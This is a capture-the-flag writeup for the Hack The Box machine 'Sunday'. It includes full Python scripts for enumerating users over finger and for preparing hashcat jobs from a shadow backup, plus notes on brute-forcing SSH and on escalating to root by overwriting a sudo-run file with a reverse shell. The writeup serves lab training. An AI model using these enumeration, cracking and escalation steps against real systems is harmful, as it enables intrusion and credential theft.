
Hack The Box: Sunday

 

Difficulty: Easy

Machine Creator: ch4p

Tools Used:
NMAP
Finger
Perl script
Metasploit
Patator
Hashcat
Python

 

Network Enumeration

First, we start with a full-port Nmap scan and discover TCP port 79 (finger) open.

User Discovery
The finger service reports which users are currently logged in. At the time of the scan nobody was logged in, so a plain query shows nothing.


We can enumerate users through finger using a Perl script by pentestmonkey.

https://github.com/pentestmonkey/finger-user-enum/blob/master/finger-user-enum.pl


Two users, sammy and sunny, have logged in before: both show a last-login timestamp of April 24 from the IP 10.10.14.4.

Alternatively, we can run finger enumeration through Metasploit.
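The enumeration above, as an added example that is neither pentestmonkey's finger-user-enum.pl nor the Metasploit module: it sends each candidate name to TCP/79 and decides whether the account exists by comparing the reply against the reply for a random name that certainly does not exist (so the check does not depend on one daemon's exact wording). The sample replies at the bottom are constructed in the traditional BSD/Solaris finger layout and were not captured from the machine; the login time in them is made up, only the date and source IP follow what the writeup reports.

```python
import re
import secrets
import socket
import string
from typing import Dict, Iterable, List

FINGER_PORT = 79  # the TCP finger port the initial scan found open


def finger_query(host: str, user: str, timeout: float = 5.0) -> str:
    """Send one finger request (the user name followed by CRLF, per RFC 1288) and return the reply."""
    with socket.create_connection((host, FINGER_PORT), timeout=timeout) as sock:
        sock.sendall(user.encode() + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def random_name(length: int = 10) -> str:
    """A name that will not be a real account; its reply is the 'unknown user' baseline."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def normalise(reply: str, queried: str) -> str:
    """Mask the queried name and collapse whitespace so replies for different names compare equal."""
    masked = re.sub(r"\b" + re.escape(queried) + r"\b", "<NAME>", reply)
    return " ".join(masked.split())


def classify(replies: Dict[str, str], baseline_name: str, baseline_reply: str) -> List[dict]:
    """Names whose reply differs from the baseline exist; keep their own row (TTY, last login, source host)."""
    base = normalise(baseline_reply, baseline_name)
    found = []
    for name, reply in replies.items():
        if normalise(reply, name) == base:
            continue
        rows = [ln for ln in reply.splitlines() if ln.split()[:1] == [name]]
        found.append({"user": name, "detail": " ".join(rows[0].split()) if rows else reply.strip()})
    return found


def enumerate_users(host: str, candidates: Iterable[str]) -> List[dict]:
    """Live version: one baseline query, then one query per candidate name."""
    base_name = random_name()
    base_reply = finger_query(host, base_name)
    replies = {name: finger_query(host, name) for name in candidates}
    return classify(replies, base_name, base_reply)


# Constructed sample replies (assumed layout, not captured from the target).
HEADER = "Login       Name               TTY         Idle    When    Where\n"
BASELINE_NAME = "zzqvbpxkrt"
BASELINE_REPLY = HEADER + "zzqvbpxkrt  ???\n"
SAMPLE_REPLIES = {
    "sunny": HEADER + "sunny       ???                ssh          <Apr 24 10:53> 10.10.14.4\n",
    "sammy": HEADER + "sammy       ???                ssh          <Apr 24 10:53> 10.10.14.4\n",
    "bob":   HEADER + "bob         ???\n",
}

if __name__ == "__main__":
    for hit in classify(SAMPLE_REPLIES, BASELINE_NAME, BASELINE_REPLY):
        print(hit["user"], "->", hit["detail"])
```

Against a live host, call enumerate_users(host, names) with a wordlist of candidate logins; the baseline comparison also catches daemons that answer unknown names with a "no such user" message instead of an empty table.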

A more in-depth Nmap scan shows SSH running on the non-standard port 22022.

SSH Brute force
Now that we have candidate usernames, we need their passwords. Hydra is the usual choice for SSH brute forcing, but because of the age of this machine's SSH server a different tool, Patator, is required. Patator brute-forced SSH and recovered sunny's password: "sunday".

Logging in over SSH then failed with "no matching key exchange method found": the client and this old server share no key-exchange algorithm by default, so the algorithm the server offers has to be passed explicitly to the SSH client (OpenSSH takes it through the KexAlgorithms option).
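The key-exchange fix above, as an added helper that is not part of the original writeup: it reads the algorithm list out of OpenSSH's "Unable to negotiate ... Their offer:" error, keeps only an algorithm the local client can still enable (checked with `ssh -Q kex`), and builds the ssh command that re-enables just that one. The error message used in the usage example is constructed in the shape OpenSSH prints; the host name "target" and the offered algorithms in it are placeholders, not something read off the machine.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# OpenSSH's error when no KEX algorithm is shared; the offer is a comma-separated list.
KEX_ERROR_RE = re.compile(r"no matching key exchange method found\. Their offer: ([\w@.,+-]+)")


def offered_kex(ssh_stderr: str) -> List[str]:
    """Key-exchange algorithms the server offers, in the server's preference order (empty if no such error)."""
    m = KEX_ERROR_RE.search(ssh_stderr)
    return m.group(1).split(",") if m else []


def client_kex() -> List[str]:
    """Algorithms the local OpenSSH build can use at all (`ssh -Q kex`); empty if ssh is not installed."""
    try:
        out = subprocess.run(["ssh", "-Q", "kex"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return []
    return out.split()


def pick_kex(offered: List[str], supported: List[str]) -> Optional[str]:
    """First offered algorithm the client can enable; None means a different client build is needed."""
    supported_set = set(supported)
    for algo in offered:
        if algo in supported_set:
            return algo
    return None


def ssh_command(user: str, host: str, port: int, kex: str) -> List[str]:
    """ssh argv that appends ('+') only the one legacy algorithm instead of replacing the whole default list."""
    return ["ssh", "-p", str(port), "-o", f"KexAlgorithms=+{kex}", f"{user}@{host}"]


def fix_for(user: str, host: str, port: int, ssh_stderr: str) -> Optional[List[str]]:
    """Full pipeline: error text in, runnable ssh argv out (None if nothing offered can be enabled locally)."""
    kex = pick_kex(offered_kex(ssh_stderr), client_kex())
    return ssh_command(user, host, port, kex) if kex else None


# Constructed error text in OpenSSH's format; host and offered algorithms are placeholders.
SAMPLE_ERROR = ("Unable to negotiate with target port 22022: no matching key exchange method found. "
                "Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1")

if __name__ == "__main__":
    argv = fix_for("sunny", "target", 22022, SAMPLE_ERROR)
    print(shlex.join(argv) if argv else "no offered KEX algorithm is available in this ssh build")
```

Enabling the single algorithm with "+" keeps the client's modern defaults for every other host; putting it in ~/.ssh/config under a Host block for this target avoids retyping the option for later sessions.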

Looking around, the user.txt flag is in Sammy's Desktop directory, but sunny does not have permission to read it.


Searching through the directories turned up a backup directory with two files; one of them is a backup of the system's shadow file, complete with password hashes.

Hash Cracking

Running both password hashes through Hashcat gives the passwords "sunday" (sunny) and "cooldude!" (sammy).

The Windows build of Hashcat was used for GPU acceleration.

Log in as sammy with the password "cooldude!".

Logged in as sammy, we can read user.txt and get the flag.
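Before handing a shadow backup to Hashcat you have to pick the right -m mode and drop the entries that carry no hash at all. The script below is an added example (not the author's tooling): it parses shadow-format lines, classifies each password field by its crypt(3) prefix (md5crypt, sha256crypt, sha512crypt, bcrypt, traditional DES) and skips locked or empty fields, including the Solaris-style "*LK*" and "NP" markers, then emits one hashcat command per hash type with --username so the cracked results stay paired with the account. It goes beyond the writeup by handling two different hash formats in one file; the sample shadow lines are constructed with placeholder digests and are not the hashes from the machine.

```python
from typing import Dict, Iterable, List, Optional, Tuple

# hashcat -m values for the crypt(3) schemes a shadow backup may contain.
CRYPT_MODES: Dict[str, Tuple[str, int]] = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
    "2a": ("bcrypt", 3200),
    "2b": ("bcrypt", 3200),
    "2y": ("bcrypt", 3200),
}
# Password fields with nothing to crack: locked ("!", "*", Solaris "*LK*"), no password ("NP"), or "x".
NO_HASH = {"", "*", "!", "!!", "*LK*", "NP", "*NP*", "x"}


def identify(field: str) -> Optional[Tuple[str, int]]:
    """Map one shadow password field to (scheme, hashcat mode), or None if it is not crackable."""
    if field in NO_HASH:
        return None
    if field.startswith("$"):
        parts = field.split("$")          # "$5$salt$digest" -> ["", "5", "salt", "digest"]
        if len(parts) >= 4 and parts[1] in CRYPT_MODES:
            return CRYPT_MODES[parts[1]]
        return None                       # unknown scheme (e.g. yescrypt "$y$"): do not guess
    if len(field) == 13:                  # traditional DES crypt: 2-char salt + 11-char digest
        return ("descrypt", 1500)
    return None


def parse_shadow(lines: Iterable[str]) -> List[dict]:
    """One record per shadow line that holds a crackable hash."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        kind = identify(fields[1])
        if kind:
            records.append({"user": fields[0], "hash": fields[1], "scheme": kind[0], "mode": kind[1]})
    return records


def hashcat_jobs(records: List[dict], wordlist: str = "rockyou.txt") -> Dict[int, dict]:
    """Group hashes by mode (hashcat runs one hash type at a time) with the file content and command for each."""
    jobs: Dict[int, dict] = {}
    for r in records:
        job = jobs.setdefault(r["mode"], {"lines": [], "command": ""})
        job["lines"].append(f"{r['user']}:{r['hash']}")
        hashfile = f"hashes_{r['mode']}.txt"
        job["command"] = f"hashcat -m {r['mode']} --username {hashfile} {wordlist}"
    return jobs


# Constructed sample in shadow format; the salts and digests are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:*LK*:17000::::::
daemon:NP:6445::::::
sunny:$5$saltsalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFG:17000::::::
sammy:$6$saltsalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx:17000::::::
"""

if __name__ == "__main__":
    for mode, job in hashcat_jobs(parse_shadow(SAMPLE_SHADOW.splitlines())).items():
        print(f"# write these {len(job['lines'])} line(s) to hashes_{mode}.txt, then run:")
        print(job["command"])
```

Write each job's lines to the named file before running its command; with --username, `hashcat --show` later prints user:hash:password so the cracked password can be matched to sammy or sunny without a second lookup.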

Privilege Escalation
Checking sudo rights as sunny shows that we can run the file /root/troll as root.

Checking sudo rights as sammy shows that we can run wget as root.

Since wget runs as root (so it can overwrite /root/troll) and /root/troll itself runs as root, we can chain the two: replace troll with our own script and execute it for an elevated reverse shell.

We serve our custom troll file from the attacking machine with Python's SimpleHTTPServer and fetch it as sammy with sudo wget.

The troll file contains a Python reverse shell.

Running "sudo /root/troll" as sunny now gives us a reverse shell as root.

With root access, we can read the contents of root.txt.